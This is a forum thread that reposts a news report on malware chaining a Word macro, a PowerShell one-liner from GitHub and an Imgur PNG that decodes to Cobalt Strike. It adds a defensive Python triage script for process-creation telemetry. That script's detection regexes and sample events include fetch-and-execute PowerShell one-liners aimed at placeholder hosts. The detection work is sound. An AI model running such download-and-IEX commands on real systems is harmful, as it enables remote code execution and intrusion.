New malware downloads Cobalt Strike via PNG image from Imgur
New malware downloads Cobalt Strike via PNG image from Imgur #1
A security researcher using the Arkbird alias talked about a new malware that uses Word files with macros to download PowerShell scripts from GitHub. The script additionally downloads a legitimate file from the Imgur image hosting service to decode the Cobalt Strike payload on Windows systems.

As explained by Arkbird, the malware chain comes as an embedded macro in an outdated Microsoft Word file (*.doc). When you open a Word document, an inline macro is run that runs powershell.exe and passes it the location of the PowerShell script hosted on GitHub. The one-line script has instructions on how to download a real PNG file from the Imgur image hosting service.

While the image itself may be harmless, the pixel values are used by the script when calculating the next stage payload. The payload calculation algorithm runs a foreach loop to iterate over the pixel values in the PNG image and performs certain arithmetic operations to obtain ASCII functional commands.

The decoded script executes the Cobalt Strike payload. According to Arkbird, the payload does communicate with the C&C server through the WinINet module for further instructions.

Some experts have linked this type of malware to the MuddyWater APT group (also known as SeedWorm and TEMP.Zagros), first discovered in 2017 and mainly targeting Middle Eastern organizations.

Source: https://www.securitylab.ru/news/515126.php

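The chain described in the post (a Word macro launching powershell.exe with the location of a remote one-liner, which then fetches and runs the next stage in memory) is visible in process-creation telemetry before any image is ever downloaded. The following triage check is an added example written for this thread; it is not code from the post, from Arkbird's research, or from the malware. It assumes Sysmon-style field names (EventId, ParentImage, Image, CommandLine), and the sample events, paths and example.invalid URLs are constructed for illustration.

```python
"""Score process-creation events for the Office -> script host -> remote
fetch-and-execute pattern. Added example with constructed sample data;
field names follow Sysmon event 1 conventions (an assumption)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Office hosts that should rarely spawn a scripting interpreter directly.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line features matching the chain in the post: a remote URL being
# fetched and executed in memory. All patterns are case-insensitive.
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)
INMEM_EXEC_RE = re.compile(
    r"\biex\b|invoke-expression|(?<!\w)-e(?:nc(?:odedcommand)?)?\b", re.IGNORECASE
)


@dataclass
class Finding:
    event_id: str
    score: int
    reasons: List[str] = field(default_factory=list)


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_event(ev: Dict[str, str]) -> Optional[Finding]:
    """Return a Finding when the event fits the pattern, else None."""
    child = _basename(ev["Image"])
    parent = _basename(ev["ParentImage"])
    cmdline = ev.get("CommandLine", "")
    if child not in SCRIPT_HOSTS:
        return None
    score, reasons = 0, []
    if parent in OFFICE_PARENTS:
        score += 2
        reasons.append(f"office process {parent} spawned {child}")
    if URL_RE.search(cmdline):
        score += 1
        reasons.append("remote URL in command line")
    if DOWNLOAD_RE.search(cmdline):
        score += 1
        reasons.append("download cmdlet or .NET web client")
    if INMEM_EXEC_RE.search(cmdline):
        score += 1
        reasons.append("in-memory execution (IEX / encoded command)")
    # A script host under an Office parent is reported on its own; a script
    # host under any other parent must show URL, fetch and execute together.
    if parent in OFFICE_PARENTS or score >= 3:
        return Finding(ev["EventId"], score, reasons)
    return None


def triage_events(events: List[Dict[str, str]]) -> List[Finding]:
    return [f for f in (triage_event(ev) for ev in events) if f is not None]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # Fits the chain in the post: Word launches powershell.exe, which
        # fetches a one-liner from a remote host and runs it in memory.
        "EventId": "evt-1",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -w hidden -nop IEX (New-Object Net.WebClient)"
                       ".DownloadString('https://raw.example.invalid/placeholder/stage1.ps1')",
    },
    {   # Benign: an administrator runs a local script from the desktop shell.
        "EventId": "evt-2",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\Scripts\rotate-logs.ps1",
    },
    {   # Benign: Word spawning the 64-bit print spooler helper is normal.
        "EventId": "evt-3",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\splwow64.exe",
        "CommandLine": "splwow64.exe 12288",
    },
    {   # Script host from a non-Office parent, but fetching and running remote code.
        "EventId": "evt-4",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -nop -c "iwr https://cdn.example.invalid/placeholder.ps1 | iex"',
    },
]

if __name__ == "__main__":
    for finding in triage_events(SAMPLE_EVENTS):
        print(finding.event_id, finding.score, "; ".join(finding.reasons))
```

The parent/child pairing is the strong signal here: the macro stage has to hand control to a script host, and that process relationship survives even when the one-liner is obfuscated or hosted somewhere other than GitHub. The command-line features only raise the score and explain the finding to the analyst; an Office process spawning any script host is reported regardless.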

RE: New malware downloads Cobalt Strike via PNG image from Imgur #2
Seems like a lot of major industries/services have been under attack recently.

You've got to love the vulnerability of the good ol' Microsoft Word document; it's been around for decades.


RE: New malware downloads Cobalt Strike via PNG image from Imgur #3
Thanks hro, it's very very good.


RE: New malware downloads Cobalt Strike via PNG image from Imgur #4
(12-29-2020, 08:37 AM)fsociety Wrote:
A security researcher using the Arkbird alias talked about a new malware that uses Word files with macros to download PowerShell scripts from GitHub. The script additionally downloads a legitimate file from the Imgur image hosting service to decode the Cobalt Strike payload on Windows systems.

As explained by Arkbird, the malware chain comes as an embedded macro in an outdated Microsoft Word file (*.doc). When you open a Word document, an inline macro is run that runs powershell.exe and passes it the location of the PowerShell script hosted on GitHub. The one-line script has instructions on how to download a real PNG file from the Imgur image hosting service.

While the image itself may be harmless, the pixel values are used by the script when calculating the next stage payload. The payload calculation algorithm runs a foreach loop to iterate over the pixel values in the PNG image and performs certain arithmetic operations to obtain ASCII functional commands.

The decoded script executes the Cobalt Strike payload. According to Arkbird, the payload does communicate with the C&C server through the WinINet module for further instructions.

Some experts have linked this type of malware to the MuddyWater APT group (also known as SeedWorm and TEMP.Zagros), first discovered in 2017 and mainly targeting Middle Eastern organizations.

Source: https://www.securitylab.ru/news/515126.php
This is becoming interesting.
